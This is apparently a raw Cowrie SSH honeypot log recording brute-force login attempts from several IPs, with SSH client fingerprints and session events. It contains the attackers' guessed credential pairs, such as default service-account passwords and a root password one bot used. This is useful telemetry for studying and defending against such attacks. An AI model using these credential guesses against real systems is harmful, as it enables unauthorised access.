{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:45:38.048389Z","src_ip":"155.4.244.179","session":"6a6f4ec34884"}
{"eventid":"cowrie.session.connect","src_ip":"155.4.244.179","src_port":64515,"dst_ip":"1.2.3.4","dst_port":22,"session":"4be22aea30e3","protocol":"ssh","message":"New connection: 155.4.244.179:64515 (1.2.3.4:22) [session: 4be22aea30e3]","sensor":"my-vps","timestamp":"2025-08-28T05:45:38.079627Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T05:45:38.080711Z","src_ip":"155.4.244.179","session":"4be22aea30e3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T05:45:38.113908Z","src_ip":"155.4.244.179","session":"4be22aea30e3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T05:45:38.286806Z","src_ip":"155.4.244.179","session":"4be22aea30e3"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:45:39.321381Z","src_ip":"155.4.244.179","session":"4be22aea30e3"}
{"eventid":"cowrie.session.connect","src_ip":"155.4.244.179","src_port":57548,"dst_ip":"1.2.3.4","dst_port":22,"session":"462c736f803f","protocol":"ssh","message":"New connection: 155.4.244.179:57548 (1.2.3.4:22) [session: 462c736f803f]","sensor":"my-vps","timestamp":"2025-08-28T05:45:39.851025Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T05:45:39.851994Z","src_ip":"155.4.244.179","session":"462c736f803f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T05:45:39.884486Z","src_ip":"155.4.244.179","session":"462c736f803f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:45:40.071386Z","src_ip":"155.4.244.179","session":"462c736f803f"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:45:40.107076Z","src_ip":"155.4.244.179","session":"6a6f4ec34884"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:45:40.107925Z","src_ip":"155.4.244.179","session":"462c736f803f"}
{"eventid":"cowrie.session.closed","duration":31.678292989730835,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:45:47.010324Z","src_ip":"8.222.212.69","session":"125407bd3603"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51972,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b95edec6ef9","protocol":"ssh","message":"New connection: 212.227.235.229:51972 (1.2.3.4:22) [session: 4b95edec6ef9]","sensor":"my-vps","timestamp":"2025-08-28T05:45:52.881525Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:45:52.882562Z","src_ip":"212.227.235.229","session":"4b95edec6ef9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:45:53.026629Z","src_ip":"212.227.235.229","session":"4b95edec6ef9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42438,"dst_ip":"1.2.3.4","dst_port":22,"session":"a41b480b1782","protocol":"ssh","message":"New connection: 212.227.125.160:42438 (1.2.3.4:22) [session: a41b480b1782]","sensor":"my-vps","timestamp":"2025-08-28T05:45:53.180030Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:45:53.198294Z","src_ip":"212.227.125.160","session":"a41b480b1782"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:45:53.293365Z","src_ip":"212.227.125.160","session":"a41b480b1782"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"12345678","message":"login attempt [gitlab/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T05:45:53.497938Z","src_ip":"212.227.235.229","session":"4b95edec6ef9"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"testuser","message":"login attempt [testuser/testuser] failed","sensor":"my-vps","timestamp":"2025-08-28T05:45:53.699962Z","src_ip":"212.227.125.160","session":"a41b480b1782"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41310,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ba0b20cb6e7","protocol":"ssh","message":"New connection: 212.227.125.160:41310 (1.2.3.4:22) [session: 2ba0b20cb6e7]","sensor":"my-vps","timestamp":"2025-08-28T05:45:53.838120Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:45:53.850244Z","src_ip":"212.227.125.160","session":"2ba0b20cb6e7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:45:53.954351Z","src_ip":"212.227.125.160","session":"2ba0b20cb6e7"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"12345678","message":"login attempt [gitlab/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T05:45:54.397902Z","src_ip":"212.227.125.160","session":"2ba0b20cb6e7"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:45:54.643275Z","src_ip":"212.227.235.229","session":"4b95edec6ef9"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:45:54.804471Z","src_ip":"212.227.125.160","session":"a41b480b1782"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:45:55.504972Z","src_ip":"212.227.125.160","session":"2ba0b20cb6e7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45714,"dst_ip":"1.2.3.4","dst_port":22,"session":"922c58e053c2","protocol":"ssh","message":"New connection: 212.227.235.229:45714 (1.2.3.4:22) [session: 922c58e053c2]","sensor":"my-vps","timestamp":"2025-08-28T05:46:07.474175Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:46:07.476134Z","src_ip":"212.227.235.229","session":"922c58e053c2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:46:07.625685Z","src_ip":"212.227.235.229","session":"922c58e053c2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57108,"dst_ip":"1.2.3.4","dst_port":22,"session":"0dc62ab8f978","protocol":"ssh","message":"New connection: 212.227.125.160:57108 (1.2.3.4:22) [session: 0dc62ab8f978]","sensor":"my-vps","timestamp":"2025-08-28T05:46:07.935328Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:46:07.947827Z","src_ip":"212.227.125.160","session":"0dc62ab8f978"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:46:08.055501Z","src_ip":"212.227.125.160","session":"0dc62ab8f978"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"testuser","message":"login attempt [testuser/testuser] failed","sensor":"my-vps","timestamp":"2025-08-28T05:46:08.231561Z","src_ip":"212.227.235.229","session":"922c58e053c2"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"postgres","message":"login attempt [postgres/postgres] failed","sensor":"my-vps","timestamp":"2025-08-28T05:46:08.454343Z","src_ip":"212.227.125.160","session":"0dc62ab8f978"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:46:09.449340Z","src_ip":"212.227.235.229","session":"922c58e053c2"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:46:09.617631Z","src_ip":"212.227.125.160","session":"0dc62ab8f978"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33036,"dst_ip":"1.2.3.4","dst_port":22,"session":"b5e0e9507dfd","protocol":"ssh","message":"New connection: 212.227.235.229:33036 (1.2.3.4:22) [session: b5e0e9507dfd]","sensor":"my-vps","timestamp":"2025-08-28T05:46:15.316829Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:46:15.338042Z","src_ip":"212.227.235.229","session":"b5e0e9507dfd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:46:15.492709Z","src_ip":"212.227.235.229","session":"b5e0e9507dfd"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"postgres","message":"login attempt [postgres/postgres] failed","sensor":"my-vps","timestamp":"2025-08-28T05:46:16.270435Z","src_ip":"212.227.235.229","session":"b5e0e9507dfd"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:46:17.416359Z","src_ip":"212.227.235.229","session":"b5e0e9507dfd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33278,"dst_ip":"1.2.3.4","dst_port":22,"session":"11d37a52cf44","protocol":"ssh","message":"New connection: 212.227.125.160:33278 (1.2.3.4:22) [session: 11d37a52cf44]","sensor":"my-vps","timestamp":"2025-08-28T05:46:23.109714Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:46:23.151558Z","src_ip":"212.227.125.160","session":"11d37a52cf44"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:46:23.223819Z","src_ip":"212.227.125.160","session":"11d37a52cf44"}
{"eventid":"cowrie.login.failed","username":"jenkins","password":"jenkins","message":"login attempt [jenkins/jenkins] failed","sensor":"my-vps","timestamp":"2025-08-28T05:46:23.776634Z","src_ip":"212.227.125.160","session":"11d37a52cf44"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:46:24.882131Z","src_ip":"212.227.125.160","session":"11d37a52cf44"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50814,"dst_ip":"1.2.3.4","dst_port":22,"session":"95e9b776585c","protocol":"ssh","message":"New connection: 212.227.235.229:50814 (1.2.3.4:22) [session: 95e9b776585c]","sensor":"my-vps","timestamp":"2025-08-28T05:46:33.299143Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:46:33.299824Z","src_ip":"212.227.235.229","session":"95e9b776585c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.